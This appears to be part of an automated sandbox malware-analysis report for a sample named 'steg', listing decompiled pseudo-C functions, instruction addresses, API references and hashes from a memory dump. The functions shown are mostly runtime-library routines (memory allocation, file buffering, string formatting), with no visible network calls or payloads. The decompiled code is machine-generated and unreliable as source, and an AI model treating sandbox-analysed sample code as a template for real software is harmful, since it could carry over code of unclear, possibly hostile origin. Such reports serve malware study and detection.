                                                                                                                    0x00fe9516
                                                                                                                    0x00fe9519
                                                                                                                    0x00fe9536
                                                                                                                    0x00000000
                                                                                                                    0x00fe9536
                                                                                                                    0x00fe951b
                                                                                                                    0x00fe9520
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe9524
                                                                                                                    0x00fe953d
                                                                                                                    0x00fe9540
                                                                                                                    0x00fe9542
                                                                                                                    0x00fe9550
                                                                                                                    0x00fe9550
                                                                                                                    0x00fe9554
                                                                                                                    0x00fe955c
                                                                                                                    0x00fe9561
                                                                                                                    0x00fe9561
                                                                                                                    0x00fe9564
                                                                                                                    0x00fe9566
                                                                                                                    0x00000000
                                                                                                                    0x00fe9568
                                                                                                                    0x00fe9568
                                                                                                                    0x00fe9570
                                                                                                                    0x00fe9572
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe9574
                                                                                                                    0x00fe9577
                                                                                                                    0x00fe957a
                                                                                                                    0x00fe9581
                                                                                                                    0x00fe9583
                                                                                                                    0x00fe958a
                                                                                                                    0x00fe9585
                                                                                                                    0x00fe9585
                                                                                                                    0x00fe9585
                                                                                                                    0x00fe958f
                                                                                                                    0x00fe9592
                                                                                                                    0x00fe9594
                                                                                                                    0x00fe967d
                                                                                                                    0x00000000
                                                                                                                    0x00fe959a
                                                                                                                    0x00fe959a
                                                                                                                    0x00fe959a
                                                                                                                    0x00fe95a1
                                                                                                                    0x00fe95e2
                                                                                                                    0x00fe95e2
                                                                                                                    0x00fe95e4
                                                                                                                    0x00fe964f
                                                                                                                    0x00fe9655
                                                                                                                    0x00fe9658
                                                                                                                    0x00fe96af
                                                                                                                    0x00000000
                                                                                                                    0x00fe96b5
                                                                                                                    0x00fe965a
                                                                                                                    0x00fe965d
                                                                                                                    0x00fe965f
                                                                                                                    0x00fe9685
                                                                                                                    0x00fe9685
                                                                                                                    0x00fe9689
                                                                                                                    0x00fe9693
                                                                                                                    0x00fe9698
                                                                                                                    0x00fe96a0
                                                                                                                    0x00fe9531
                                                                                                                    0x00fe9531
                                                                                                                    0x00000000
                                                                                                                    0x00fe9531
                                                                                                                    0x00fe9661
                                                                                                                    0x00fe9664
                                                                                                                    0x00fe9667
                                                                                                                    0x00fe9668
                                                                                                                    0x00fe9668
                                                                                                                    0x00fe9669
                                                                                                                    0x00fe966c
                                                                                                                    0x00fe966f
                                                                                                                    0x00fe9672
                                                                                                                    0x00000000
                                                                                                                    0x00fe9672
                                                                                                                    0x00fe95e6
                                                                                                                    0x00fe95e8
                                                                                                                    0x00fe960c
                                                                                                                    0x00fe9611
                                                                                                                    0x00fe9617
                                                                                                                    0x00fe9619
                                                                                                                    0x00fe9619
                                                                                                                    0x00fe95ea
                                                                                                                    0x00fe95ec
                                                                                                                    0x00fe95f2
                                                                                                                    0x00fe9604
                                                                                                                    0x00fe9604
                                                                                                                    0x00fe9604
                                                                                                                    0x00fe9606
                                                                                                                    0x00fe95f4
                                                                                                                    0x00fe95f9
                                                                                                                    0x00fe95fb
                                                                                                                    0x00fe95fb
                                                                                                                    0x00fe9608
                                                                                                                    0x00fe9608
                                                                                                                    0x00fe961b
                                                                                                                    0x00fe961e
                                                                                                                    0x00000000
                                                                                                                    0x00fe9620
                                                                                                                    0x00fe9620
                                                                                                                    0x00fe9621
                                                                                                                    0x00fe962b
                                                                                                                    0x00fe962c
                                                                                                                    0x00fe9631
                                                                                                                    0x00fe9634
                                                                                                                    0x00fe9636
                                                                                                                    0x00fe96bd
                                                                                                                    0x00000000
                                                                                                                    0x00fe96bd
                                                                                                                    0x00fe963c
                                                                                                                    0x00fe963f
                                                                                                                    0x00fe96ab
                                                                                                                    0x00fe96ab
                                                                                                                    0x00fe96ab
                                                                                                                    0x00fe96ab
                                                                                                                    0x00000000
                                                                                                                    0x00fe96ab
                                                                                                                    0x00fe9641
                                                                                                                    0x00fe9641
                                                                                                                    0x00fe9643
                                                                                                                    0x00fe9643
                                                                                                                    0x00fe9646
                                                                                                                    0x00fe9649
                                                                                                                    0x00000000
                                                                                                                    0x00fe9649
                                                                                                                    0x00fe961e
                                                                                                                    0x00fe95a3
                                                                                                                    0x00fe95a6
                                                                                                                    0x00fe95a9
                                                                                                                    0x00fe95ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe95ad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe95b3
                                                                                                                    0x00fe95b5
                                                                                                                    0x00fe95b7
                                                                                                                    0x00fe95b9
                                                                                                                    0x00fe95b9
                                                                                                                    0x00fe95bc
                                                                                                                    0x00fe95bf
                                                                                                                    0x00fe95c1
                                                                                                                    0x00000000
                                                                                                                    0x00fe95c7
                                                                                                                    0x00fe95ce
                                                                                                                    0x00fe95d3
                                                                                                                    0x00fe95d6
                                                                                                                    0x00fe95d9
                                                                                                                    0x00fe95dc
                                                                                                                    0x00fe95de
                                                                                                                    0x00000000
                                                                                                                    0x00fe95de
                                                                                                                    0x00fe9675
                                                                                                                    0x00fe9675
                                                                                                                    0x00fe9675
                                                                                                                    0x00000000
                                                                                                                    0x00fe959a
                                                                                                                    0x00fe9594
                                                                                                                    0x00fe9566
                                                                                                                    0x00fe9549
                                                                                                                    0x00fe954c
                                                                                                                    0x00fe954e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe954e
                                                                                                                    0x00fe9526
                                                                                                                    0x00fe952b
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3877424927-0
                                                                                                                    • Opcode ID: 58f39add579991dad9ef1299213d9b84eb0245becf2f57f16a0bdcd36f41b157
                                                                                                                    • Instruction ID: af8386d4494b5f307fafe3fa79988f9bb33561692dc860691149e3982db1b935
                                                                                                                    • Opcode Fuzzy Hash: 58f39add579991dad9ef1299213d9b84eb0245becf2f57f16a0bdcd36f41b157
                                                                                                                    • Instruction Fuzzy Hash: 0B51C471E093859BDB258F6B8C806AE77A5AF40330F24872EF825962D0D7F59D50AB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F90637 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00F90637(void* __ebx, void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v1032;
				char _v1036;
				char _v1040;
				void* __esi;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				intOrPtr _t36;
				char* _t42;
				intOrPtr _t46;
				void* _t47;
				void* _t48;
				intOrPtr _t49;
				void* _t66;
				void* _t68;
				void* _t70;
				void* _t71;
				intOrPtr* _t72;
				signed int _t73;

				_t64 = __edx;
				_t45 = __ebx;
				_v8 =  *0x481f80 ^ _t73;
				_t23 = _a4;
				_t49 =  *_t23;
				_t72 = _a8;
				_v1036 = 0;
				_v1040 = 0;
				if(_t49 != 0) {
					_push(__edi);
					_push(0x400);
					_push( &_v1032);
					if(_t49 == 0x7e) {
						_push(_t23 + 1);
						_t25 = E00F8B777();
						if(_t25 == 0) {
							goto L11;
						} else {
							_t17 = _t25 + 1; // 0x1
							_t67 = _t17;
							_t28 = E00FE7BCE(__ebx, _t17, _t17);
							 *_t72 = _t28;
							if(_t28 != 0) {
								E00FE7AF9(_t28, _t67,  &_v1032);
								_pop(_t68);
								return E00FE72F2(1, __ebx, _v8 ^ _t73, _t64, _t68, _t72);
							} else {
								goto L11;
							}
						}
					} else {
						_push(_t23);
						if(E00F8B777() == 0 || E00F91067( &_v1032, _t32,  &_v1040,  &_v1036) == 0) {
							L11:
							_pop(_t66);
							return E00FE72F2(0, _t45, _v8 ^ _t73, _t64, _t66, _t72);
						} else {
							_t69 = _v1040;
							if(_v1040 == 0) {
								goto L11;
							} else {
								_push(__ebx);
								_t46 = _v1036;
								_t13 = _t46 + 1; // 0x1
								_t36 = E00FE7BCE(_t46, _t69, _t13);
								 *_t72 = _t36;
								if(_t36 != 0) {
									E00FE7337(_t36, _t69, _t46);
									 *((char*)(_t46 +  *_t72)) = 0;
									_pop(_t47);
									_pop(_t70);
									return E00FE72F2(1, _t47, _v8 ^ _t73, _t64, _t70, _t72);
								} else {
									_pop(_t48);
									_pop(_t71);
									return E00FE72F2(_t36, _t48, _v8 ^ _t73, _t64, _t71, _t72);
								}
							}
						}
					}
				} else {
					_t42 = E00FE7BCE(__ebx, __edi, 1);
					 *_t72 = _t42;
					 *_t42 = 0;
					return E00FE72F2(1, __ebx, _v8 ^ _t73, __edx, __edi, _t72);
				}
			}























                                                                                                                    0x00f90637
                                                                                                                    0x00f90637
                                                                                                                    0x00f90647
                                                                                                                    0x00f9064a
                                                                                                                    0x00f9064e
                                                                                                                    0x00f90650
                                                                                                                    0x00f90653
                                                                                                                    0x00f9065d
                                                                                                                    0x00f90669
                                                                                                                    0x00f9068e
                                                                                                                    0x00f90692
                                                                                                                    0x00f9069d
                                                                                                                    0x00f9069e
                                                                                                                    0x00f90733
                                                                                                                    0x00f90734
                                                                                                                    0x00f9073e
                                                                                                                    0x00000000
                                                                                                                    0x00f90740
                                                                                                                    0x00f90740
                                                                                                                    0x00f90740
                                                                                                                    0x00f90744
                                                                                                                    0x00f9074c
                                                                                                                    0x00f90750
                                                                                                                    0x00f9076d
                                                                                                                    0x00f9077a
                                                                                                                    0x00f90789
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f90750
                                                                                                                    0x00f906a4
                                                                                                                    0x00f906a4
                                                                                                                    0x00f906af
                                                                                                                    0x00f90752
                                                                                                                    0x00f90752
                                                                                                                    0x00f90763
                                                                                                                    0x00f906d7
                                                                                                                    0x00f906d7
                                                                                                                    0x00f906df
                                                                                                                    0x00000000
                                                                                                                    0x00f906e1
                                                                                                                    0x00f906e1
                                                                                                                    0x00f906e2
                                                                                                                    0x00f906e8
                                                                                                                    0x00f906ec
                                                                                                                    0x00f906f4
                                                                                                                    0x00f906f8
                                                                                                                    0x00f9070e
                                                                                                                    0x00f90718
                                                                                                                    0x00f9071c
                                                                                                                    0x00f9071d
                                                                                                                    0x00f90731
                                                                                                                    0x00f906fa
                                                                                                                    0x00f906fa
                                                                                                                    0x00f906fb
                                                                                                                    0x00f9070a
                                                                                                                    0x00f9070a
                                                                                                                    0x00f906f8
                                                                                                                    0x00f906df
                                                                                                                    0x00f906af
                                                                                                                    0x00f9066b
                                                                                                                    0x00f9066d
                                                                                                                    0x00f90672
                                                                                                                    0x00f90677
                                                                                                                    0x00f9068d
                                                                                                                    0x00f9068d

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 00F9066D
                                                                                                                      • Part of subcall function 00FE7BCE: __FF_MSGBANNER.LIBCMT ref: 00FE7BE5
                                                                                                                      • Part of subcall function 00FE7BCE: __NMSG_WRITE.LIBCMT ref: 00FE7BEC
                                                                                                                    • _malloc.LIBCMT ref: 00F906EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1579825452-0
                                                                                                                    • Opcode ID: 1d39e5989a297ab83a30d9f49a44099e95956c0efd58856c6507a816c9dd62df
                                                                                                                    • Instruction ID: 5b9a1758e23dc4988ec99bf86a9469c77f6a95767188b966661b815d942bc748
                                                                                                                    • Opcode Fuzzy Hash: 1d39e5989a297ab83a30d9f49a44099e95956c0efd58856c6507a816c9dd62df
                                                                                                                    • Instruction Fuzzy Hash: 8D31CAB1A042489FDF14EBA9DC41BEE73A8EF45310F0001A9FE4997242EE79AA459B51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0100E0EC Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E0100E0EC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				long _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				signed short* _v1052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t27;
				signed short** _t31;
				wchar_t* _t40;
				void* _t45;
				void* _t51;
				intOrPtr _t52;
				void* _t53;
				signed int _t54;
				void* _t55;
				void* _t57;

				_v8 =  *0x482960 ^ _t54;
				_t52 = _a4;
				_v1048 = _a8;
				_v1044 = _a12;
				_t26 = E0106C711(_a12, _a16, 0x4742f5);
				_push(0);
				_push(_t52);
				L0106BD44();
				_t45 = _t26;
				_t27 = E0106CD57(_t45, _t52, _t45);
				_t53 = _t27;
				_t57 = _t55 + 0x10;
				if(_t53 == 0) {
					L3:
					return E0106BE87(0, _t45, _v8 ^ _t54, _t51, _t52, _t53);
				} else {
					_push(_t53);
					_push(_t45);
					_push(0);
					_push(_t52);
					L0106BD4A();
					if(_t27 != 0) {
						_push( &_v1036);
						_t31 =  &_v1052;
						_push(_t31);
						_push(0x4742f8);
						_push(_t53);
						L0106BD50();
						if(_t31 == 0) {
							goto L2;
						} else {
							swprintf( &_v1032, 0x400, 0x474314,  *_v1052 & 0x0000ffff, _v1052[1] & 0x0000ffff, _v1048);
							_t57 = _t57 + 0x18;
							_push( &_v1036);
							_push( &_v1040);
							_t40 =  &_v1032;
							_push(_t40);
							_push(_t53);
							L0106BD50();
							if(_t40 == 0) {
								goto L2;
							} else {
								E0106C711(_v1044, _a16, _v1040);
								E0106CD1F(_t53);
								return E0106BE87(1, _t45, _v8 ^ _t54, _t51, _t52, _t53);
							}
						}
					} else {
						L2:
						 *0x47412c();
						E0106CD1F(_t53);
						goto L3;
					}
				}
			}
























                                                                                                                    0x0100e0fc
                                                                                                                    0x0100e105
                                                                                                                    0x0100e110
                                                                                                                    0x0100e11a
                                                                                                                    0x0100e120
                                                                                                                    0x0100e128
                                                                                                                    0x0100e12a
                                                                                                                    0x0100e12b
                                                                                                                    0x0100e130
                                                                                                                    0x0100e133
                                                                                                                    0x0100e138
                                                                                                                    0x0100e13a
                                                                                                                    0x0100e13f
                                                                                                                    0x0100e160
                                                                                                                    0x0100e170
                                                                                                                    0x0100e141
                                                                                                                    0x0100e141
                                                                                                                    0x0100e142
                                                                                                                    0x0100e143
                                                                                                                    0x0100e145
                                                                                                                    0x0100e146
                                                                                                                    0x0100e14d
                                                                                                                    0x0100e177
                                                                                                                    0x0100e178
                                                                                                                    0x0100e17e
                                                                                                                    0x0100e17f
                                                                                                                    0x0100e184
                                                                                                                    0x0100e185
                                                                                                                    0x0100e18c
                                                                                                                    0x00000000
                                                                                                                    0x0100e18e
                                                                                                                    0x0100e1b4
                                                                                                                    0x0100e1b9
                                                                                                                    0x0100e1c2
                                                                                                                    0x0100e1c9
                                                                                                                    0x0100e1ca
                                                                                                                    0x0100e1d0
                                                                                                                    0x0100e1d1
                                                                                                                    0x0100e1d2
                                                                                                                    0x0100e1d9
                                                                                                                    0x00000000
                                                                                                                    0x0100e1df
                                                                                                                    0x0100e1ee
                                                                                                                    0x0100e1f4
                                                                                                                    0x0100e211
                                                                                                                    0x0100e211
                                                                                                                    0x0100e1d9
                                                                                                                    0x0100e14f
                                                                                                                    0x0100e14f
                                                                                                                    0x0100e14f
                                                                                                                    0x0100e156
                                                                                                                    0x00000000
                                                                                                                    0x0100e15b
                                                                                                                    0x0100e14d

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0100E133
                                                                                                                      • Part of subcall function 0106CD57: __FF_MSGBANNER.LIBCMT ref: 0106CD6E
                                                                                                                      • Part of subcall function 0106CD57: __NMSG_WRITE.LIBCMT ref: 0106CD75
                                                                                                                    • _free.LIBCMT ref: 0100E156
                                                                                                                    • swprintf.LIBCMT ref: 0100E1B4
                                                                                                                    • _free.LIBCMT ref: 0100E1F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_mallocswprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 977208848-0
                                                                                                                    • Opcode ID: d6b6ee1db0460668af34d651dc04538c6f312164209d917a8e2ab7af3dd59f59
                                                                                                                    • Instruction ID: 7f244ad0d1aeb48deff02d8d9e103b62a3cf751513790f3c20cf5a17c3426063
                                                                                                                    • Opcode Fuzzy Hash: d6b6ee1db0460668af34d651dc04538c6f312164209d917a8e2ab7af3dd59f59
                                                                                                                    • Instruction Fuzzy Hash: E331A2F2A0011D6BEB11BB64CD40FEE77ACAF68200F0400E5FB48E6141EB359A918BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FE93FA Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00FE93FA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t47;
				void* _t48;
				intOrPtr _t54;
				signed int _t60;
				void* _t61;
				intOrPtr _t65;
				void* _t68;

				_push(0x10);
				_push(0x47dac8);
				E00FEEC57(__ebx, __edi, __esi);
				if((0 |  *((intOrPtr*)(_t68 + 8)) != 0x00000000) != 0) {
					_t65 =  *((intOrPtr*)(_t68 + 0xc));
					_t65 = _t65 != 0;
					if(_t65 != 0) {
						goto L1;
					} else {
						__eflags =  *(_t65 + 0xc) & 0x00000040;
						if(( *(_t65 + 0xc) & 0x00000040) != 0) {
							L14:
							_t54 = E00FEFF27( *((intOrPtr*)(_t68 + 8)));
							 *((intOrPtr*)(_t68 - 0x1c)) = _t54;
							E00FEEFE7(_t65);
							 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
							_t41 = E00FEEE7D(_t54, __eflags, _t65);
							 *((intOrPtr*)(_t68 - 0x20)) = E00FEFDC8( *((intOrPtr*)(_t68 + 8)), 1, _t54, _t65);
							E00FEEE4C(_t41, _t65);
							 *(_t68 - 4) = 0xfffffffe;
							E00FE94F8(_t65);
							__eflags =  *((intOrPtr*)(_t68 - 0x20)) - _t54;
							_t37 = (__eflags == 0) - 1;
							__eflags = (__eflags == 0) - 1;
						} else {
							_t47 = E00FEEF23(_t65);
							_t60 = _t47;
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L7:
								_t48 = 0x482cc0;
							} else {
								__eflags = _t60 - 0xfffffffe;
								if(_t60 == 0xfffffffe) {
									goto L7;
								} else {
									_t48 = ((_t47 & 0x0000001f) << 6) +  *((intOrPtr*)(0x487f50 + (_t60 >> 5) * 4));
								}
							}
							__eflags =  *(_t48 + 0x24) & 0x0000007f;
							if(( *(_t48 + 0x24) & 0x0000007f) != 0) {
								goto L1;
							} else {
								__eflags = _t60 - 0xffffffff;
								if(_t60 == 0xffffffff) {
									L12:
									_t61 = 0x482cc0;
								} else {
									__eflags = _t60 - 0xfffffffe;
									if(_t60 == 0xfffffffe) {
										goto L12;
									} else {
										_t61 = ((_t60 & 0x0000001f) << 6) +  *((intOrPtr*)(0x487f50 + (_t60 >> 5) * 4));
									}
								}
								__eflags =  *(_t61 + 0x24) & 0x00000080;
								if(( *(_t61 + 0x24) & 0x00000080) != 0) {
									goto L1;
								} else {
									goto L14;
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00FEC705())) = 0x16;
					_t37 = E00FEC696() | 0xffffffff;
				}
				return E00FEEC9C(_t37);
			}











                                                                                                                    0x00fe93fa
                                                                                                                    0x00fe93fc
                                                                                                                    0x00fe9401
                                                                                                                    0x00fe9410
                                                                                                                    0x00fe942c
                                                                                                                    0x00fe9434
                                                                                                                    0x00fe9436
                                                                                                                    0x00000000
                                                                                                                    0x00fe9438
                                                                                                                    0x00fe9438
                                                                                                                    0x00fe943c
                                                                                                                    0x00fe949d
                                                                                                                    0x00fe94a5
                                                                                                                    0x00fe94a7
                                                                                                                    0x00fe94ab
                                                                                                                    0x00fe94b2
                                                                                                                    0x00fe94b7
                                                                                                                    0x00fe94ca
                                                                                                                    0x00fe94cf
                                                                                                                    0x00fe94d7
                                                                                                                    0x00fe94de
                                                                                                                    0x00fe94e5
                                                                                                                    0x00fe94eb
                                                                                                                    0x00fe94eb
                                                                                                                    0x00fe943e
                                                                                                                    0x00fe943f
                                                                                                                    0x00fe9445
                                                                                                                    0x00fe9447
                                                                                                                    0x00fe944a
                                                                                                                    0x00fe9465
                                                                                                                    0x00fe9465
                                                                                                                    0x00fe944c
                                                                                                                    0x00fe944c
                                                                                                                    0x00fe944f
                                                                                                                    0x00000000
                                                                                                                    0x00fe9451
                                                                                                                    0x00fe945c
                                                                                                                    0x00fe945c
                                                                                                                    0x00fe944f
                                                                                                                    0x00fe946a
                                                                                                                    0x00fe946e
                                                                                                                    0x00000000
                                                                                                                    0x00fe9470
                                                                                                                    0x00fe9470
                                                                                                                    0x00fe9473
                                                                                                                    0x00fe948e
                                                                                                                    0x00fe948e
                                                                                                                    0x00fe9475
                                                                                                                    0x00fe9475
                                                                                                                    0x00fe9478
                                                                                                                    0x00000000
                                                                                                                    0x00fe947a
                                                                                                                    0x00fe9485
                                                                                                                    0x00fe9485
                                                                                                                    0x00fe9478
                                                                                                                    0x00fe9493
                                                                                                                    0x00fe9497
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe9497
                                                                                                                    0x00fe946e
                                                                                                                    0x00fe943c
                                                                                                                    0x00fe9412
                                                                                                                    0x00fe9412
                                                                                                                    0x00fe9417
                                                                                                                    0x00fe9422
                                                                                                                    0x00fe9422
                                                                                                                    0x00fe94f1

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftbuf__getptd_noexit__lock_file__stbuf_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 583463211-0
                                                                                                                    • Opcode ID: 09c5d80d8fcb19464d5a52424c282238ab65492efece285c179610394c12f1a9
                                                                                                                    • Instruction ID: fcecbf3cc1e29ba85509b9a9c984d352a19d08f6481af178f07970421cb1ac80
                                                                                                                    • Opcode Fuzzy Hash: 09c5d80d8fcb19464d5a52424c282238ab65492efece285c179610394c12f1a9
                                                                                                                    • Instruction Fuzzy Hash: 6821F871E182C556DB20AA379D4176D36A1AFC1330F25C729F8348A1E1DBBC9D43B265
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8F2D7 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 23%
                                                                                                                    			E00F8F2D7() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				intOrPtr* _t20;
				void* _t24;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t28;

				_v8 =  *0x481f80 ^ _t28;
				_t20 =  *0x470104;
				_t7 =  *_t20(0xfffffff5);
				_t8 =  *0x47004c(_t7,  &_v32);
				_t25 = _v24 & 0x0000ffff;
				_t32 = _t8;
				if(_t8 == 0) {
					_t25 = 0xf;
				}
				_t9 =  *_t20(0xfffffff5);
				_t27 =  *0x470050;
				 *_t27(_t9, 0xf);
				E00FE9C53(_t20, _t25, _t27, _t32);
				E00FE9C53(_t20, _t25, _t27, _t32);
				E00FE9C53(_t20, _t25, _t27, _t32);
				_t14 =  *_t20(0xfffffff5, 0x4703d0, 0x470398, 0x470378, 0x470360, 0x47035c, 0x470318);
				 *_t27(_t14, 0xf);
				E00FE9C53(_t20, _t25, _t27, _t32);
				_t17 =  *_t20(0xfffffff5, 0x470318);
				return E00FE72F2( *_t27(_t25 | 0x00000008), _t20, _v8 ^ _t28, _t24, _t25 | 0x00000008, _t27, _t17);
			}




















                                                                                                                    0x00f8f2e4
                                                                                                                    0x00f8f2e8
                                                                                                                    0x00f8f2f2
                                                                                                                    0x00f8f2f9
                                                                                                                    0x00f8f2ff
                                                                                                                    0x00f8f303
                                                                                                                    0x00f8f305
                                                                                                                    0x00f8f307
                                                                                                                    0x00f8f307
                                                                                                                    0x00f8f30e
                                                                                                                    0x00f8f310
                                                                                                                    0x00f8f319
                                                                                                                    0x00f8f320
                                                                                                                    0x00f8f334
                                                                                                                    0x00f8f343
                                                                                                                    0x00f8f34d
                                                                                                                    0x00f8f352
                                                                                                                    0x00f8f359
                                                                                                                    0x00f8f363
                                                                                                                    0x00f8f37c

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: d9fc15d2961dd4f35383039be6e2641827a6309336160a2c73362129a3b00a7e
                                                                                                                    • Instruction ID: 48ca3576094555d35a9118a6d30a8c53d85c333a8a47af68adc886ac5bdb6727
                                                                                                                    • Opcode Fuzzy Hash: d9fc15d2961dd4f35383039be6e2641827a6309336160a2c73362129a3b00a7e
                                                                                                                    • Instruction Fuzzy Hash: C901D652B45359F7CB1077BA5C46EAF375C9B45B30F20422ABE2CA20C1D8A894005279
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FF305D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00FF305D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00FF35AA(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00FF30E3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00FF381F(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00FF3760(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                                                                    0x00ff3060
                                                                                                                    0x00ff3066
                                                                                                                    0x00ff30d9
                                                                                                                    0x00000000
                                                                                                                    0x00ff306d
                                                                                                                    0x00ff306d
                                                                                                                    0x00ff3070
                                                                                                                    0x00ff308b
                                                                                                                    0x00ff308e
                                                                                                                    0x00ff30ae
                                                                                                                    0x00ff30c0
                                                                                                                    0x00ff3090
                                                                                                                    0x00ff3090
                                                                                                                    0x00ff3093
                                                                                                                    0x00000000
                                                                                                                    0x00ff3095
                                                                                                                    0x00ff30a7
                                                                                                                    0x00ff30a7
                                                                                                                    0x00ff3093
                                                                                                                    0x00ff30de
                                                                                                                    0x00ff30e2
                                                                                                                    0x00ff3072
                                                                                                                    0x00ff308a
                                                                                                                    0x00ff308a
                                                                                                                    0x00ff3070

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
